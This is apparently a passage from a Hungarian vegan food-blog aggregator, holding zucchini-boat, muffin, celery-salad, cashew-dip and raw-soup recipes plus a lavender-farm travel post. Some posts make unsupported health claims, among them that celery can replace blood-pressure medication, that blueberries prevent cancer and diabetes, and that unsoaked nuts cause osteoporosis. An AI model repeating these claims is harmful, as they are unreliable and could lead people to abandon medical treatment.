alapanyagra lelhetünk, mely megkönnyíti egészséges ételeink elkészítsését a jövőben. Ráadásul még olcsó is, és az év nagy részében hozzá lehet jutni. Kísérletezzünk vele bátran! ;-) Rengeteg féle fajta cukkini hajó receptet találhatunk a magyar és idegen nyelvű honlapokon, szakácskönyvekben. Én itt a Zöld Avocado gasztroblogon most hoztam nektek egy magyaros ízvilágú, babos pörköltet kuszkusszal, cukkini hajókban tálalva, illetve egy nagyon hasonló, de olaszos ízvilágú paradicsomos kuszkuszos tölteléket, cukkini alapokon, melyek vendégváró falatkáknak is tökéletesek! Fogadjátok sok szeretettel őket, és engedjétek a fantáziátokat szabadon, amikor elkészítitek a saját hajóitokat, akár a gyerekekkel közösen! ;-) olaszos ízvilágú, paradicsomos, kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán) HOZZÁVALÓK: magyaros cukkini hajókhoz: - 2 db vastag, roppanós cukkini - 1/2 bögre kuszkusz (ha gluténmentesre szeretnénk, használjunk GM gabonát pl.: kölest, barna rizst, amarántot, vagy quinoát) - 1 bögre forró víz - 1 db bio vörösbab konzerv (vagy előfőzött száraz bab) - 1/2 db vöröshagyma - 2 ek extra szűz olíva olaj - Himalája só, frissen őrölt fekete bors, 2-3 ek fűszerpaprika őrlemény - 1 doboz szójatejföl a hajók tetejének meglocsolására olaszos vendégváró falatkákhoz: - 2 db vékonyabb nyers cukkini - 1/2 bögre kuszkusz (ha gluténmentesre szeretnénk, használjunk GM gabonát pl.: kölest, barna rizst, amarántot, vagy quinoát) - 1 bögre forró víz - 100 g bio paradicsom püré / sűrített paradicsom - 1 db nagyobb sárgarépa lereszelve - 1/2 db vöröshagyma - 2 ek extra szűz olíva olaj - 2-3 friss bazsalikom levél - Himalája só, frissen őrölt fekete bors, oregano - kendermag a tetejére - (söréleszőtpehely - opcionálisan) vörösbab pörkölt kuszkusszal, cukkini hajókban tálalva (laktózmentes, tojásmentes, vegán) ELKÉSZÍTÉS: KUSZKUSZOS BAB PÖRKÖLT CUKKINI HAJÓKBAN TÁLALVA Előkészítjük a kuszkuszt a szokásos módon. Forralunk 1 bögre vizet. Beletesszük az 1/2 bögre kuszkuszt egy mély keverő tálba, majd ráborítjuk a forró vizet. Sózzuk a tetejét, majd gyorsan, légmentesen lezárjuk a tálat folpackkal. Hagyjuk, hogy a kuszkusz magába szívja a vizet, és a vízgőzben megpuhuljon, megdagadjon. Kb. 15 perc alatt teljesen magába szívja a vizet, és elkészül a kuszkusz. Közben előkészítjük a cukkini hajókat, és a tölteléket. Alaposan megmossuk a cukkiniket, és levágjuk a fás végeit. Majd 4 részre vágjuk a cukkinit úgy, hogy egyszer keresztbe szétvágjuk az egész cukkinit, majd a két fél cukkinit hosszában is ketté vágjuk. Így lesz belőle 4 nagyjából egyforma méretű cukkini hajó alap. Fogunk egy evőkanalat, és kikaparjuk a "hajók" belsejét (a magos, puhább részt) egy tálba. Így készítjük el a hajó testet! ;-) Hagyjunk egy kb. 1 cm-es cukkini "hús" részt a zöld héjon. (Lásd a képen). Miután mind a két cukkinivel elvégeztük ezt az előkészítő műveletünket, kapnunk kell 8 db cukkini törzsből kivájt csónakot, és egy tálban összeömlesztve a kikapart cukkini belsőket. (Érdemes apró cafatokban kikaparni őket, nem nagy darabokba, mert könnyebb lesz bánni velük később.) Feltesszük egy edényben az apróra vágott vöröshagymát dinsztelődni az olíva olajon. Amint a hagyma aranybarna, hozzákeverjük a fűszerpaprika őrleményt, és elkeverjük. Majd hozzáöntjük a vörösbab konzervet a levével együtt, illetve a kikapart cukkini belsőket is. Sózzuk, borsozzuk, (ha szükséges még teszünk hozzá fűszerpaprikát), majd folyamatos kevergetés mellett kb. 10 perc alatt készre főzzük a babos cukkini "pörköltet". Miután elkészült a pörkölt, lezárjuk a tűzhelyet, és hozzákeverjük a készre párolt kuszkuszt. Az egészet egybekeverve kapjuk meg a végleges tölteléket. Ha szükséges, sózzuk és borsozzuk még egyszer a tölteléket. Egy jó fűszeres, piros, pörköltszerű ízt szeretnénk kapni. A cukkini hajó törzsekbe óvatosan belekanalazgatjuk a babos-cukkinis pörkölt tölteléket, meglocsoljuk egy kevés szója tejföllel a tetejét, és 180°C fokra előmelegített sütőbe tesszük a hajókat. Kb.15 perc múlva már meg is puhultak ezek a finom, és különleges cukkini hajók. Tálalhatjuk friss saláta levelekkel, vagy szimplán így önmagukban is ezeket a teljesértékű, könnyen emészthető, egészséges és ízletes főételeket! ;-) vörösbab pörkölt kuszkusszal, cukkini hajókban tálalva (laktózmentes, tojásmentes, vegán) Jó étvágyat kívánunk! :-) OLASZOS PARADICSOMOS VENDÉGVÁRÓ FALATKÁK Az előző recepthez hasonlóan elkészítjük a kuszkuszt, és megdinszteljük a vöröshagymát. Az aranybarna vöröshagymához hozzákeverjük a reszelt sárgarépát, a paradicsom pürét, 1dl tiszta vizet, a sót, borsot, és oregánót, a friss bazsalikom leveleket, majd az egészet kb.5 perc alatt készre főzzük. Hozzáadjuk a készre párolt kuszkuszt. A nyers cukkiniket alaposan megmossuk, és levágjuk a fás végeit. Kb.1,5 cm-es vatagságú karikákat vágunk a cukkinikből, és a tetejükre kanalazzuk az olaszos paradicsomos kuszkusz tölteléket. Ezúttal nem tettem be őket a sütőbe, hanem így, nyers és roppanós cukkini falatokkal kínáltam a vendégeket. Megszórtam a vendégváró falatokat kendermaggal, hogy a növényi fehérje is biztosítva legyen a zöldség és gabona mellett. (Ha van otthon sörélesztőpehely, szórjuk meg azzal is.) Ha valaki nem szereti a nyers cukkinit, akkor mielőtt rákanalazná a tölteléket, puhítsa meg a cukkini karikákat a sütőben kb. 10 perc alatt, majd utána tegye rá a paradicsomos kuszkuszt. olaszos ízvilágú, paradicsomos, kuszkuszos vendégváró falatkák (laktózmentes, tojásmentes, vegán) Tápanyagban gazdag, örömteli vendégvárást kívánunk! ;-) Megjegyzés: Én most egy kicsit lusta voltam, és konzerves babot, illetve gyári paradicsompürét használtam. Ha van időtök, és kedvetek főzzétel elő ti a vörösbabot otthon (szárazbabból), és készítsetek házi paradicsompürét. Sokkal egészségesebb lesz az ételetek! ;-)
Az áfonya jótékony hatásai
2015. augusztus 10. Élj harmóniában
Az áfonya nagyon népszerű bogyós gyümölcs szerte a világon. Nálunk Magyarországon nemrégen kezdett elterjedni - korábban mindenki csak a Hupikék törpikékben hallott róla:). Nagyon magas az antioxidáns tartalma, mely számos betegséggel szemben segít a szervezetnek védelmet nyújtani. Segít megelőzni a cukorbetegség kialakulását, csökkenti a rákos megbetegedések kockázatát és véd a szív- és érrendszeri betegségekkel szemben Az áfonya segít a szervezetet fiatalosabban tartani, lassítja az öregedés folyamatát és c sökkenti az öregkori betegségek kialakulását. Rendszeres áfonya fogyasztás e gészségesen tartja a bőr és m egakadályozza a szembetegségek kialakulását. Az áfonya segíti az emésztést is. Legjobb frissen, nyersen és bio áfonyát fogyasztani, mert így tudod a legtöbb tápanyagot kinyerni belőle:)
Áfonyás kókuszos muffin (vegán, gluténmentes)
2015. július 31. Zizi kalandjai
Na végre egy süti a blogon és most az idő is olyan, hogy érdemes bekapcsolni a sütőt. Egyszerű muffinok, én áfonyával dobtam fel, de lehet beletenni szedret is, vagy ha van még friss málna elvétve, akkor azt is. Hajdinalisztből készült, de ezt legközelebb lecserélném hajdinaliszt és mandula/mogyoróliszt (darált mandula vagy mogyoró) keverékére, úgy nem lenne intenzív a hajdina íze, amit sokan nem szeretnek. Aki nem szereti a hajdinát, az nyugodtan cserélje le tönkölylisztre, csak akkor nem lesz gluténmentes. A tésztába raktam zabpelyhet is, szóval csak akkor 100%-osan gluténmentes, ha sikerül gluténmentes zabpelyhet beszerezni. A sötét színét a kókuszvirág cukor adja, nem égettem meg őket! Szeretem a kókuszvirág cukor ízét, de annyira megszínezi a kekszeket, muffinokat, hogy olyan, mintha odaégettem volna a sütit… ez néha magyarázatra szorul, pláne, ha ajándékba, vendégségbe viszem a sütiket. A kókuszvirág cukron kívül, kókuszolaj és kókuszreszelék is került bele. Gyorsan összedobható, próbáljátok ki a hétvégén! Áfonyás kókuszos muffin (vegán, gluténmentes) Hozzávalók: – 3/4 bögre hajdinaliszt – 1/2 bögre mandula/mogyoróliszt (darált mandula vagy mogyoró) – 1/3 bögre kókuszreszelék – 1/2 bögre zabpehely – 3/4 bögre kókuszvirágcukor – 2 evőkanál lenmag + 6 evőkanál víz (tojás helyettesítésére) – 1 és 1/2 teáskanál szódabikarbóna – 1/4 teáskanál fahéj – 1/2 teáskanál só – 1/2 bögre almapüré/almaszósz (jó a kis üveges bébiétel almapüré, ez 125 g és 1/2 bögrének felel meg) – 1/2 bögre rizstej + 1 teáskanál almaecet – 1/4 bögre kókuszolaj – 1 vaníliarúd kikapart magjai – áfonya Egy tálkában keverjük össze a lenmagot a vízzel és hagyjuk állni néhány percig, amíg kocsonyás állagú lesz. Melegítsük elő a sütőt 175 fokra. Béleljük ki a muffintepsit papírkapszlikkal. Egy tálban keverjük össze a száraz hozzávalókat: hajdinaliszt, mandulaliszt, kókuszreszelék, zabpehely, szódabikarbóna, kókuszvirágcukor, fahéj és só. Egy másik tálban keverjük össze a nedves hozzávalókat: almapüré, rizstej, kókuszolaj és vanília és lenmag víz keveréke. A nedves hozzávalókat öntsük a szárazhoz és keverjük össze. Adjuk a tésztához az áfonyát és jól keverjük el. Kanállal osszuk el a tésztát egyenlő részben a muffinformákban. Süssük 175 fokon kb. 25-30 percig, amíg aranybarnák lesznek. Kivétel előtt azért végezzünk tűpróbát, hogy jól átsültek-e a muffinok.
Magyaros mártogatós
2015. július 28. Gitta nyersétel blogja
Nyáron itt a kerti partik ideje, biztosan sok vendég örül, ha a hagyományos ételek mellé valamilyen üdítően friss és ropogós fogás is megjelenik az asztalon. Saját tapasztalatom, hogy ezek fogynak el legelőször. Sokféle nyers mártogatóst ismerek, de ez az első számú. Ha gyorsan össze kell dobni valamit, vagy kóstolóra vinni, vagy egy bemutatón aszalványokat kísérni, mindig ez a recept jut eszembe. Egyszerű és gyors, és általában minden hozzávaló van otthon. Magyaros mártogatós Hozzávalók: kb 10 dkg kesudió, 1 kaliforniai paprika, 2 gerezd fokhagyma, só, tisztított víz A kesudiót kevés vízzel turmixgépbe tesszük, belekockázzuk a paprikát és a fokhagymát, és simára turmixoljuk. Annyi vizet adjunk hozzá, hogy az állaga megfelelő legyen. Lehet hígabb, mert idővel sűrűsödni fog. Ehhez adhatunk bármilyen zöldséget, uborkát, paprikát, zellerszárat, sárgarépát vagy aszalt ropogtatnivalót, krékert. Kesudió helyett használhatsz napraforgómagot, de vele nem lesz olyan finom, krémes. Ami még bejött: felesben keverve... fele napra, fele kesu... egy jó kompromisszum a ízek és a pénztárcánk között... :)
Roppanós és édes zeller saláta, almával és dióval (gluténmentes, laktózmentes, tojásmentes, vegán, nyers)
Ezt a receptet már korábban készítettem, de úgy gondolom, most nagyon aktuális. Még mindig meleg van, így még mindig friss, vitalizáló, tápanyagban gazdag és lédús ételekre vágyunk, anélkül, hogy a konyhában kellene hosszú órákat töltenünk. Egy gyors, és egyszerű, szemet gyönyörködtető, nagyon finom, magas tápértékű saláta, amit akár egész évben bármikor elkészíthetünk. :-) roppanós és édes zeller saláta, almával és dióval (mindenmentes, vegán, nyers) A zeller egy megosztó zöldségféle. Egyedi íze miatt én is a "nem szeretem" kategóriába tartozom. Igyekszem a zöldségeket önmaguk természetes, és értékes állapotukban felhasználni, és fogyasztani. Lehetőleg kevés fűszert használok, hogy újra megtanulhassa a testem érezni a természet adta csodálatos ízeket, és zamatokat. :-) Azonban vannak zöldségek, mint például a szárzeller, amit egyszerűen képtelen vagyok önmagában, nyersen fogyasztani. Mivel rendkívül hasznos tápanyagtartalommal bír, ez az egész évben elérhető zöldségféle, ezért megpróbálom kitalálni, hogy milyen formában tudom belecsempészni az étkezéseinkbe, anélkül, hogy direktben érintkezne az íze a nyelvemmel?! :-) Ilyen, egyik általam használt megoldás a naponta fogyasztott zöld turmix, amiben rengeteg zöldséget vagy fűszert el lehet dugni, és fogyasztani, anélkül, hogy észrevennénk, hogy az adott hozzávalót nem szeretjük. ;-) A másik ilyen étel, a téli hidegben szívesen kanalazgatott zellerkrémleves. Most pedig egy újabb saláta ötlettel szolgálok nektek, amiben szintén alig érezhető a szárzeller markáns íze. Nekünk nagyon tetszett a színes, és roppanós saláta, amiben a diónak köszönhetően (a tökéletes növényi fehérje és ásványi- anyag forrás) még laktató is volt! édes pácban pihenő szárzeller (mindenmentes, vegán, nyers) A zeller nem tartozik a világ és Magyarország legfontosabb zöldségnövényei közé. Megítélése nyugat-európában kedvezőbb, mint Magyarországon. Mivel az elmúlt pár évet mi is nyugat-európai országokban töltöttük, így nap, mint nap találkozhattunk a szárzellerrel a szupermarketekben. Mikor először a kezembe vettem, fogalmam sem volt mi az, és mit kellene vele csinálnom?! Az angol 'celery' megnevezés pedig teljesen összezavart, hisz korábban a zellerhez más képélmény tartozott. Ha az ember egy számára új kultúrában tölti mindennapjait, és azt látja, hogy egy addig idegen dolog, a másik kultúrában mindennapos, és természetes, akkor elkezd ismerkedni, az addig ismeretlen dologgal, szokással, étellel. Én is így tettem! :-) Hála az internetnek, manapság, nagyon gyorsan juthatunk új információhoz, és ismeretekhez! Zeller ügyben hamar fel is zárkóztam nyugat-európai társaimhoz! ;-) roppanós és édes zeller saláta, almával és dióval (mindenmentes, vegán, nyers) "A zeller sokszínűbb, többféleképpen felhasználható, mint elsőre gondolnánk. Először is, a zellernek három fő típusa van: a gumós, a halványító- és a metélőzeller. Nálunk és Közép-Európában az első változatot termesztik, Angliában, Franciaországban, Olaszországban és Észak-Amerikában pedig inkább a halványítózellert kedvelik. A metélő típusnak kisebb a jelentősége. A gumós zellernek gumóját, levelét, a halványított zellernek akár 30-40 cm hosszú, húsos levélnyelét, a metélőzellernek levelét használják fel ételkészítésre." Az általam leggyakrabban használt zeller fajtát, "szárzellernek, rúdzellernek, angolzellernek és halványított vagy halványító zellernek is hívják. Magas víztartalom és kevés kalória jellemzi. Nagyon friss és üde zöldség. A rostokban gazdag szárzeller a fogyókúrázók kedvelt étele, hiszen kalóriaértéke igen alacsony, 100 grammban mindössze 14 kcal van. Tartalmaz nátriumot, kalciumot, foszfort, káliumot, vasat, magnéziumot, vitaminokat és nyomelemeket is. Kiváló méregtelenítő és tisztító hatású, segít megszabadulni a felesleges salakanyagoktól, így a narancsbőr ellen is hatékony. Tisztítja a bőrt, gyulladáscsökkentő, erősíti az idegrendszert. A benne található rostoknak köszönhetően segíti a bélrendszer működését, mely nagyban hozzájárul immunitásunk megőrzéséhez is. Az angolzellert Ázsiában évezredek óta használják a vérnyomás csökkentésére,ha a túlzott sóbeviteltől, vagy az egészségtelen életmódtól billent ki a szervezetünk. Ez a zöldség segíthet eldobni a gyógyszert! Ehhez napi négy szál angolzellert kell elrágcsálni, vagy gyümölcscentrifugában ki kell csavarni a levét, és jól meginni. " Forrás: ködpiszkaló És akkor ennyi ismerkedés után jöjjön a recept! Gluténmentes, laktózmentes, tojásmentes, mindenmentes, nyers, vegán, és nagyon egyszerűen elkészíthető. Ásványi anyagokban, vitaminokban, rostban gazdag saláta, melyet bárki el tud készíteni, és szinte egész évben hozzájuthatunk a hozzávalókhoz! A salátában található dió, pedig tökéletes húspótló a vegetáriánus étrenden élőknek. Semmihez sem hasonlítható, nem szokványos, édeskés ízű saláta, telis tele frissességgel, energiával! ;-) roppanós és édes zeller saláta, almával és dióval (mindenmentes, vegán, nyers) HOZZÁVALÓK: - 4 szál szárzeller megmosva, felkockázva - 3 ek agave szirup vagy rizsszirup (vagy magas minőségű méz, de akkor már nem mondható vegánnak) - 1/2 érett avokádó - 4 szem retek - 1 nagy alma meghámozva feldarabolva kis kockákra - 1/2 gránátalma magja - 1 marék dió (előre beáztatva 24 órára) - saláta ágy (bármilyen zöld ropogós saláta levél) - 1 marék napraforgómag és 1 marék szezámmag - opcionálisan saláta öntet: 1/2 alma, 1 ek agave vagy rizssziruppal roppanós és édes zeller saláta, almával és dióval (mindenmentes, vegán, nyers) ELKÉSZÍTÉS:Nagyon gyorsan és egyszerűen elkészíthető salátáról van szó, melyhez csupán két apró előkészület kell, de utána pillanatok alatt összeállíthatjuk az ételt. Az időigényesebb, de egyszerű előkészületek: Áztassuk be a diót min.24 órára, a könnyebb emészthetőség és az egészséges fogyasztás miatt. A feldarabolt és megmosott szárzellert pácoljuk be 1-2 órára a választott édesítő szirupba, hogy enyhüljön a zeller markáns íze, és kapjon egy nagyon finom édeskés mázat. Az olajos magvak a gabonafélék tökéletes helyettesítői, de figyeljün rá, hogy ne vigyük túlzásba a fogyasztásukat. Magas a kalóriaértékük és az Omega6 olaj tartalmuk is. De ami még rosszabb, hogy még a gabonaféléknél is magasabb a fitátsav tartalmuk, amik a bélrendszerben felszívódási zavarokat okozhatnak. Lekötik az ásványi anyagokat, vitaminokat és így azok nem tudnak hasznosulni, csontritkulást, fogszuvasodást és egyéb hiánybetegségeket okozva. Ezért a nyers magvakat FONTOS, HOGY MEGFELELŐEN ELŐÁZTASSUK, aminek köszönhetően enzimgátló tartalmuk elbomlik. Az áztató vizet nem szabad felhasználni, és dió esetében többször cseréljük! Ajánlott áztatási idők: apró magvaknál 1-2 óra, közepes magvaknál 4-5 óra, dióféléknél minimum 24 óra. roppanós és édes zeller saláta, almával és dióval (mindenmentes, vegán, nyers) Végül a saláta összeállítása: A pácolás után adjuk hozzá a többi hozzávalót apró darabokra vágva, szórjuk meg a magokkal, és már ehetjük is az édeskés, roppanós, lédús és friss, energiában gazdag salátánkat! :-) Ha valaki úgy érzi, hogy szüksége van a salátán az öntetre, akkor turmixoljon le egy fél almát héj nélkül, 1 ek agave sziruppal (vagy más édesítővel), és borítsa az almapürét a salátára. Ez lesz a saláta öntet! roppanós és édes zeller saláta, almával és dióval (mindenmentes, vegán, nyers) Tápanyagban, frissességben, és gasztroélményekben gazdag jó étvágyat kívánunk! :-) +1 RECEPT ÖTLET: Sokan vannak, akik velem ellentétben, szeretik a szárzellert nyersen is, és szívesen rágcsálják film nézés közben. Az interneten számos jóízű mártogatós recept ötletet lehet találni, amivel feldobhatjuk a zeller nasinkat. Én is hoztam nektek egy egyszerűen elkészíthető, fűszeres magyaros mártogatóst. :-) Áztassunk be egy 1/2 bögre natúr kesu diót előző éjszaka, majd öntsük le róla az áztató vizet. Tegyünk hozzá 2 db érett, és zamatos, közepes méretű paradicsomot, 1/4 piros húsú kaliforniai paprikát, egy kevés sót, fehér borsot, és jó sok szárított chili fűszerport (ízlés szerint), majd turmixoljuk össze az egészet. (Sörélesztőporral még finomabb, és tápanyagdúsabb, de elhagyható). Amikor már egy kellemesen krémes, egynemű piros krémet kaptunk, tálaljuk hozzá a zeller rudacskákat, és már mehet is a nassolás! Kellemes kikapcsolódást mellé! ;-) fűszeres mártogatós zellerhez (mindenmentes, nyers) fűszeres mártogatós zellerhez (mindenmentes, nyers) Megjegyzés: "A szárzellert házi veteményesekben, magról vetve, palántázva sem ördöngösség meghonosítani. Az árnyékos helyeket érdemes neki adni, elegendő vízhez jutva júliustól decemberig folyamatosan friss szárakkal hálálja meg a befogadást. A veteményesben jó szomszédságot ápol az uborkával és a karfiollal, csak saját magával nem közösködik - ott nem terem újra, ahol egyszer már előfordult. Furcsa egy szokás. " Forrás: HVG
Szeretek enni!
2015. július 18. Sose mondd, hogy soha
Gyerekkoromban rémesen rossz evő voltam. Sose bírtam sokat enni és nagyon-nagyon válogattam. Egyszer általánosban a német tanárnő beírt az ellenőrzőmbe, hogy "Anna a német óra kellős közepén kakaós csigát eszik" - erre anyukám és a nagyimék csak nevettek: hála az égnek, hogy eszik! Főzni se szerettem/tudtam és az egész evés téma egy szükséges rossz volt az életemben. Innen jöttem. Most viszont: szeretek enni! Imádom az itthon rám váró ételeket. Az a legnagyobb problémám, hogy nem tudok dönteni, melyiket egyem, mert mind olyan tökéletesen finom! Van isteni őszibari, van édes magyar dinnye és egy adag saláta-hozzávaló: paradicsom, uborka, paprika és avokádó. Mindegyikhez kedvem van, de egyszerre persze nem lehet, melyikkel kezdjem? Hatalmas problémáim vannak, mint látható... :) Apropó: avokádó. Nem tudtam, hogy szeretem. Sokáig kesutejföllel ettem az esti salit, majd anyagi megfontolásból átálltam a napraforgó tejfölre és jól elvoltam vele, bár tudtam, hogy nem a legideálisabb magot enni minden nap. Pár napja Petra hozott egy szép érett avokádót, hogy azt tegyük a saliba felkockázva. Nekem végem. Elvesztem. Megint beleszerettem valami drága dologba... De biztos, hogy jobb innen szerezni a zsírt, mint magokból, szóval a testem hálás lesz. Az egész napi kajám tegnap is és ma is két ezer forint volt. Ha egy hónapra számoljuk, 60 lesz és az nem éppen kevés. De ugyanazt tudom erről írni, amit már oly sokszor: nem kell kávé, cigi, alkohol, arckrémek, dezodor, tusfürdő, fejfájás csillapító és nem mellesleg: egészséges és fiatal maradok még sokáig. Innen nézve nem tűnik drágának. Nagyon örülök, hogy megtaláltam ezt az utat és nem adtam fel, legalábbis sosem végleg ;)
Pikk-pakk kész, főzésmentes zöldségleves gazdagon (gluténmentes, laktózmentes, tojásmentes, vegán, nyers)
Ennek a posztnak azt a címet is adhattam volna, hogy Pak Choi leves nyersen újratöltve! :-D Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindementes, vegán, nyers) Megint jön a kánikula... Szerintem senkinek nem mondok vele újat, ha azt írom, hogy a nagy melegben mindenki a lédús, friss és üde ételekre, sok sok folyadékra, nyers és roppanós zöldségekre, édes gyümölcsökre vágyik! Ilyenkor nem is egészséges túlzásba vinni a főtt, sült, fűszeres ételek fogyasztását. Vérbeli magyarként azonban, nem túl sok nyers, párolt, természetes ételt ismerünk. Alig tudjuk elképzelni, hogy a hagyományos zöld leveles salátákon túl is van élet, ha könnyed ételt szeretnénk fogyasztani! ;-) Egy ilyen, kánikulában is tökéletesen frissítő, energiadús és tápanyagban gazdag, újabb pikk-pakk kész receptet hoztam nektek. Egy zöldséglevest, melyhez nem kell bekapcsolni a tűzhelyet, csakis természetes és friss alapanyagokból készül, nagyon ízletes és még szemet gyönyörködtető is. Még egy példa rá, hogy nem csak hideg gyümölcslevest lehet készíteni főzés nélkül! ;-) Pak choi zöldségleves Májusban bemutattam nektek itt a Zöld Avocado blogon, hogy mi is az a Pak choi, és hogyan készíthetünk belőle egyszerűen nagyszerű, finom zöldséglevest. Kaptam néhány visszajelzést, hogy kipróbáltátok, és rettentően ízlett nektek is! :-) Az akkori recept megjelenés után felvetődött egy kérdés egy nyersétkezős olvasótól, amit én nem tudtam figyelmenkívül hagyni, így természetesen "Challenge accepted!", itt a megoldás rá! :-) A feldobott labda pedig az volt, hogy hogyan lehetne elkészíteni ennek a levesnek a nyers változatát, olvasóknak, akik nem fogyasztanak hőkezelt ételeket? A válasz hamar megszületett bennem, és most, hogy mindenki olyan recepteket keres, amikkel könnyebb átvészelni a fülledt, meleg nyári napokat, azt hiszem tökéletes az időzítés, hogy megosszam veletek. nyers gyümölcsös kókuszgolyóknyers kókuszos kosárkák Egyre többen vannak a világban, azok az emberek, akik nem fogyasztanak semmiféle hőkezelt ételt, csakis nyersen elkészíthető, ún. élő ételekkel (raw food) táplálják a testüket. Ezt az irányzatot enzimtáplálkozásnak, vagy NYERS (VEGÁN) TÁPLÁLKOZÁSnak is hívják. A zöldségek, gyümölcsök a hő hatására sajnos elveszítik vitamin tartalmuk nagy részét, illetve az egészséges táplálkozáshoz szükséges teljes enzim tartalmukat, ezért a nyersétkezők minden növényi alapanyagot úgy fogyasztanak, ahogyan azt a természet megalkotta, nyersen. :-) Az aszalás az egyetlen technológia, ami engedélyezett az irányzat követői számára. (40°C még az a maximum hőmérséklet, ahol a vitaminok és enzimek még nem sérülnek.) Ha teheted, te is fogyassz minél több nyers és friss, tápanyagban és enzimben gazdag, és kevesebb feldolgozott ételt! Segítsünk, hogy igaz legyen Hippokratész egyik elhíresült mondása: ,,Ételed legyen orvosságod, orvosságod legyen ételed. Bővebben a nyers vegán táplálkozásról Antal Vali oldalán, vagy Urbán Vali oldalán a nyersetel.hu-n is olvashatsz. Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers) HOZZÁVALÓK (kb.4 főnek): az alapléhez: - 1 db pak choi vagy mángold - 1 szál szárzeller - 1/4 lila hagyma - 1-1,5 liter tiszta víz - Himalája só, frissen őrölt fekete bors - 2 ek sörélesztőpehely a leves tartalmához: - 2 db közepes sárgarépa felkarikázva - 1 marék karfiol apró rózsákra szedve, mint galuskák a levesben - 1/2 db sárga (kaliforniai) paprika - 1 marék friss petrezselyem - 1 bögre zöldborsó Minden hozzávalót frissen és nyersen használunk fel ebben a levesben. Mivel kevés a hozzáadott fűszer, és hőkezelés sem éri a zöldségeket, ezért az össz ízhatást nagyban befolyásolja, hogy milyen finom zöldségeket használunk. Próbáljunk meg jó minőségű, kisebb gazdaságokból származó, bio alapanyagokat használni! Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers) ELKÉSZÍTÉS: Ez egy újabb egyszerűen elkészíthető, pikk-pakk kész, életerőben gazdag, élő leves, amit akár a konyhában idegenként mozgó családtagjaink (férj, feleség, gyerekek) is bármikor meglephet minket vele! ;-) Össze kell csak dobálni a hozzávalókat, a turmix gépbe, majd egy tálba, és kész is. :-) Ezt pedig bárki meg tudja csinálni! ;-) A leves alapléhez szükséges hozzávalóit a fűszerek nélkül (zeller, pak choi vagy mángold, lila hagyma, víz) tegyük a turmixgépbe, és jó alaposan dolgoztassuk össze vele, míg egy teljesen híg levet nem kapunk. Öntsük az egészet egy nagyobb tálba, vagy akár leveses edénybe, majd tegyük hozzá a fűszereket ízlés szerint (Só, bors és sörélesztőpehely), és keverjük el. Most mehetnek bele az előre felaprított rágnivaló részek (karfiol, borsó, paprika, répa). Használhatunk egyéb, nyersen is fogyasztható zöldségeket kedvünk szerint (pl.: cukkini, brokkoli). Mindent nyersen, hőkezelés nélkül használjunk, így sokkal értékesebbek, mert a hőre érzékeny vitaminok is megmaradnak. Ettől lesz olyan energiadús, és friss, aminek köszönhetően mi is új erőre kapunk a nagy melegben! ;-) Amint beleszórtunk mindent a fűszeres alaplébe, már tálalhatunk is! Ugye, hogy gyors volt? ;-) Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers) Táplálékban, energiában és frissességben gazdag jó étvágyat kívánunk ehhez a hűsítő, enzimgazdag zöldségleveshez! ;-) Megjegyzés1: Ha már nem kaptok Pak choi-t a jól bevált zöldségeseteknél (elméletben már vége a tavaszi pak choi szezonnak), akkor sem kell elmenteni ezt a receptet a következő szezonig, mert helyette használhatunk mángoldot is. Ugyanolyan finom leves lé készül belőle! Próbáljátok ki! :-) Megjegyzés2: Sokkal finomabb, mint ahogy azt a fejemben előre gondoltam! Meglepően abbahagyhatatlanul finom és még tápláló is lett ez a leves! A sok sok rágnivaló pedig gondoskodik róla, hogy jól lakjunk, a rengeteg vitaminnak, ásványi anyagnak, nyomelemnek, és enzimnek köszönhetően pedig még gyógyítjuk is a testünket közben! ;-) Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers)
Könyvajánló: Horváth Judit: Szerelmem, cupcake! Csészetorták díszmagyarban
2015. július 9. Dulmina tündérkonyhája
Mindig örömmel tölt el, ha a külföldön már nagy népszerűségre szert tett dolgokat nem csak az eredeti, illetve lefordított leírásokból és receptekből ismerhetem meg, hanem megjelenik róluk a magyar viszonyokhoz szabott mű is. Horváth Judit könyve ilyen. A külföldön élő magyar szerző a cupcake-ek, vagyis csészetorták világába kalauzol el ebben a szép, igényes megjelenésű kiadványban. A kötet
Levendula, levendula…..
Imádom a levendulát… ahogy sokan mások. Az illatát, a szépségét, a lényét….. Tihanyba szerettem volna menni eredetileg levendulát szedni, de megakadt a szemem egy másik “Szedd magad levendula” helyen, Monoszlón, a Magyar Provence levendulabirtokon. Nem volt kétséges, hogy amint lehetőségem lesz, már indulok is. Július 2-án, egy meleg nyári napon meg is tettük. Útközben megálltunk Nagyvázsonyban, megnéztük a Kinizsi-várat, és egy jót falatoztunk a vár közelében lévő autós pihenőben, ahol szemet gyönyörködtetően csordogált egy kis forrás, madarak csivitelése, ágról ágra ugrándozása tette mosolygósabbá az ottlétünket. A monoszlói levendulabirtokon nagyon kedves fogadtatásban volt részünk, egy levendula illatú boltocskába csöppentünk, ahol mindjárt meg is kóstolhattuk a levendulaszörpöt. Isteni finom volt. Talán kóstoltam már máshol is, de olyan túl híg lére emlékszem, aminek nem sok köze volt a levendula ízhez. Az itteni levendulaszörpnek fenségesen erős íze volt. Lehetett választani, hogy egy papírzacskóba szedünk levendulát 1000 Ft-ért, egy kis kosárba 3000 Ft-ért, vagy egy nagyobb kosárkába 5000 Ft-ért. A kosárkát természetesen haza is lehetett vinni. Én a nagy kosárka mellett döntöttem. Elsőként a ház mögött lévő angol levendulásban szedtem néhány angol levendula szálat. Ollót vittünk magunkkal, így nem jelentett gondot a szép, gondos aratása. Gyönyörű táj… egy kis völgyben: (a képek nagyobb méretben a képre kattintva megtekinthetők) angol levendulák: Utána a francia levendulásba vezetett utunk. Más kinézet, picit más illat, erőteljesebb szín…. Francia levendula: Szép volt a látvány…. szép volt minden. Köszönöm az élményt! Mivel a közelben van Hegyestű, megtekintettük ezt a helyet is, ahonnan csodás kilátás nyílik a Balaton felvidéki hegyekre és “tengerünkre”, a Balatonra. Természetesen a kalandot egy zánkai fürdőzés zárta. Feltöltődve, levendulaillattal az orrunkban, szívünkben érkeztünk haza. A következő napokban a levendulákat összekötöztem kis csokrokba, megszárítom őket. Szárítás: árnyékos, de szellős helyen, fejjel lefelé lógatva. Levendula szárítása: Ajándék csokrocskák: Hogy mi készül 